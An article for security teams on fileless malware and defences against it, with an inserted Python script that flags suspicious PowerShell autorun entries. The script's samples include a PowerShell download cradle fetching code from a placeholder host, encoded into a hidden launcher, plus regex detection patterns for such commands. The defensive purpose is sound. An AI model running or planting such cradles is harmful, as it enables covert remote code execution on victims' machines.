
How your security team can combat new fileless malware

John P. Mello Jr., Freelance writer, Independent

Imagine malicious software that's almost invisible on your network's computers as it performs all sorts of damaging deeds. That's the threat system defenders face with fileless malware.

The malware is called fileless because it's designed to run entirely in memory and to cover most, if not all, signs of itself on a storage device. "This can take different forms, including malware that automatically removes its delivery package and runs solely in memory or that repurposes existing code like in-memory PowerShell commands," explained Peter Martini, co-founder and President of Iboss, a network behavior security monitoring company.

Like many attack techniques, fileless malware has a long history. "It's something that virus writers in the '90s did," noted Christopher Kruegel, co-founder and CEO of malware protection platform maker Lastline. "Their techniques are being rediscovered."

Although the malware is fileless when it's in memory, it still needs a file to set up shop on a system. It does that the same way most malware ends up on a machine: through a malicious attachment or compromised website. "It's a two-step process," Kruegel explained. "First you need to exploit the machine with shell code. Once the shell code is running, you download and execute the second stage, the payload that's the actual malware program."

With fileless malware, the payload isn't stored on disk. It's run directly in memory. "The benefit of that is there's no file on disk that an antivirus program can look at," Kruegel said.

Here's what your security team needs to know about invisible fileless malware—and how to defend against it.


Why it's difficult to detect

Many legacy antivirus solutions rely on existing malware signatures to detect and block malicious traffic. Fileless malware is designed to avoid that kind of detection. "The security community spends a lot of effort focusing on files," said Paul Ewing, a senior threat researcher at Endgame, an endpoint protection provider.

"It's looking at the analysis of a file or how a file executes to determine if it's malicious," he continued. "What the attackers have done is evolve. They've started using software found on a system that's already been vetted by security products."

For example, administrators have robust tools, such as PowerShell on Windows systems, that can be devastating to an organization's security if they come under the control of malicious actors. "My company blocks PowerShell," said Raef Meeuwisse, director for cybersecurity and data privacy governance at publisher Cyber Simplicity. "PowerShell commands can't be issued, so any malware attack that uses them can't be successful."

One drawback to living in memory is that life may be short. Memory is volatile. If a system is rebooted, everything in memory disappears, including an attacker's malware. That's bad news for most adversaries, because persistence is an important part of their threat plan. "In a true fileless attack, where there are no artifacts on disk, an attacker would not have any persistence," Ewing said.

However, most attackers try to address that contingency. One method they use on Windows machines is to hide a malicious script in the Windows registry. On a reboot, the script can be designed to load automatically and reload the hacker's malware into memory. "If the attacker wants to persist, that gives defenders an advantage because there are nuances in the registry we can use to find something malicious," Ewing explained.
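As an added illustration of the registry nuance Ewing describes (this is example code written for this page, not code from the article or from any vendor quoted in it), the Python script below applies simple heuristics to Windows autorun values: encoded or hidden-window PowerShell launchers and in-memory download cradles. The entry names and command lines are constructed samples; a live check would feed it the values read from the Run keys instead.

```python
import base64
import re

# Constructed sample autorun values, shaped like the data under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run (made-up, not real indicators).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_RUN_ENTRIES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": "powershell.exe -NoP -W Hidden -EncodedCommand "
               + base64.b64encode(CRADLE.encode("utf-16le")).decode("ascii"),
    "Sync": r'powershell -ep bypass -w hidden -c "Get-Content C:\ProgramData\s.txt | IEX"',
}

# -EncodedCommand may be abbreviated (-e, -ec, -enc); its argument is base64 of UTF-16LE text.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Each indicator is a label and a regex matched case-insensitively against the
# command line plus, when present, the decoded -EncodedCommand payload.
INDICATORS = [
    ("powershell-launcher", r"\b(?:powershell|pwsh)(?:\.exe)?\b"),
    ("encoded-command", ENCODED_RE.pattern),
    ("hidden-window", r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    ("policy-bypass", r"(?:^|\s)-e(?:p|xecutionpolicy)\s+bypass\b"),
    ("no-profile", r"(?:^|\s)-nop(?:rofile)?\b"),
    ("in-memory-exec", r"\biex\b|invoke-expression"),
    ("download-cradle", r"net\.webclient|downloadstring|downloadfile|invoke-webrequest"),
]

def decode_encoded_command(command):
    """Return the plaintext of a -EncodedCommand payload, or None if there is none."""
    match = ENCODED_RE.search(command)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_entry(name, command):
    """Match every indicator against one autorun value and its decoded payload."""
    decoded = decode_encoded_command(command)
    haystack = command if decoded is None else command + "\n" + decoded
    hits = [label for label, pattern in INDICATORS if re.search(pattern, haystack, re.I)]
    # A bare PowerShell launcher is common in legitimate software, so require two hits.
    return {"name": name, "indicators": hits, "decoded": decoded, "suspicious": len(hits) >= 2}

def scan_run_entries(entries):
    """Return the analyses of the entries that tripped at least two indicators."""
    return [r for r in (analyze_entry(n, c) for n, c in entries.items()) if r["suspicious"]]

if __name__ == "__main__":
    for result in scan_run_entries(SAMPLE_RUN_ENTRIES):
        print(result["name"], result["indicators"])
        if result["decoded"]:
            print("  decoded payload:", result["decoded"])
```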

In addition, malware writers aren't often content with infecting a single machine. "In order to persist, what a fileless malware attack usually does is try to find other vulnerable machines on the same network so it can propagate itself," said Meeuwisse, who is also external relations director at the London chapter of ISACA, an association for IT professionals with 140,000 members in 180 countries.

The threat from fileless malware is growing

Fileless malware is a threat now, and it's expected to grow as existing tools are honed to improve the malicious software's evasiveness and new tools are developed. "It's definitely a growing trend," said Ewing. "I think we'll see more of it just because it seems like a natural response from the attackers. As we get better and better at detecting malicious files, then the evolution will be for hackers to use legitimate tools to their advantage."

What's more, the technique has almost become a necessity for adversaries targeting high-value targets. "Hackers know that the most valuable targets are generally well-protected and require the use of more advanced attack tools capable of avoiding detection and mitigation," Martini explained. "While some hackers will always focus on the low-hanging fruit, the more ambitious or skilled attackers will always be focused on developing more advanced tools like fileless malware."

That skill level, though, appears to be sinking. "Fileless malware is definitely more complex to develop than standard attack techniques," Martini said, "but as its use continues to increase and attack tools are publicized, they become much easier to deploy. Hackers are very adept at sharing information amongst each other, leading to easier and more efficient deployment methods spreading among the community rapidly."

Kruegel added, "The bar for creating fileless malware is getting lower, which is why we see it increasingly used by the bad guys."

Exploit kits are also lowering the barriers to entry into the fileless malware realm. When a hacking technique becomes fashionable, it starts to appear in exploit kits, which simplifies its adoption. "I think the level of skill required now is getting much lower because hackers can pick up commoditized, prepackaged pieces that they can start using in these attacks," Meeuwisse said.


How your team can fight back against fileless

To defend against fileless malware attacks, organizations need to think beyond signature-based solutions. "They need to focus on tools that can identify malicious behavior on the network and implement proper cybersecurity hygiene like the timely patching of disclosed vulnerabilities and frequently revisit network isolation policies to ensure infected machines are identified and quarantined quickly," Martini said.

Developers, too, can contribute to defending against fileless malware attacks by building security into their applications from the beginning of the development lifecycle. "Too often, security is bolted on as an afterthought," Martini explained. "There will always be bugs and vulnerabilities in software, but if security is top of mind throughout the development process, they can be minimized and identified before they're exploited by attackers."

Secure coding practices play an important role in foiling fileless malware because much of it requires an exploit to infect a machine. "Developers need to continue to make apps that are less likely to be exploited and contain as few vulnerabilities as possible," Ewing said.

Since fileless malware writers are looking for ways to compromise legitimate processes, services, and macros so they can operate without detection, developers need to lock those things down so they work only the way they're supposed to work. They also need to better understand how their programs work in memory. "If data used in a process is very sensitive, developers need to protect that data by encrypting it in memory or making sure it's written to a secure block of memory that's wiped after it's used," ISACA's Meeuwisse noted.

He added that security architects will also be addressing the problem. "We're going to see a marked decline in the use of trusted networks in organizations as they look to run environments that have improved capabilities to containerize threats," he said.

"If you've got 20 machines on a network and they all trust each other, then a malware attacker is going to find it a lot easier to get around and to cripple your organization than if you have an environment with 20 devices that don't trust each other at all, because an attack that affects one won't affect the other 19," he explained.

There are new approaches coming

As fileless malware writers hone their tools, the security industry isn't sitting on its hands. There are some next-generation tools that show promise in combating fileless malware. Those tools depart from how the security industry is trying to address the problem now, which is to hook into processes in memory to determine if those processes are compromised. "Essentially, that's a hack," said Golan Ben-Oni, global chief information officer for IDT Corp.

"What the antivirus tools are doing is leveraging the same methods for prevention that attack tools leverage for destruction," he explained. "At some point, we have to take a step back and say, 'We shouldn't allow that.'"

Rather than hack processes in memory, next-generation antivirus products work directly with an operating system's kernel. "That's a much deeper approach to security," Ben-Oni said. "They can see an attempt to inject malicious code into processes and immediately isolate the problem."

"Ninety-nine percent of the antivirus industry has approached this problem from the user level," he added. "Working at the kernel level is far more powerful and effective."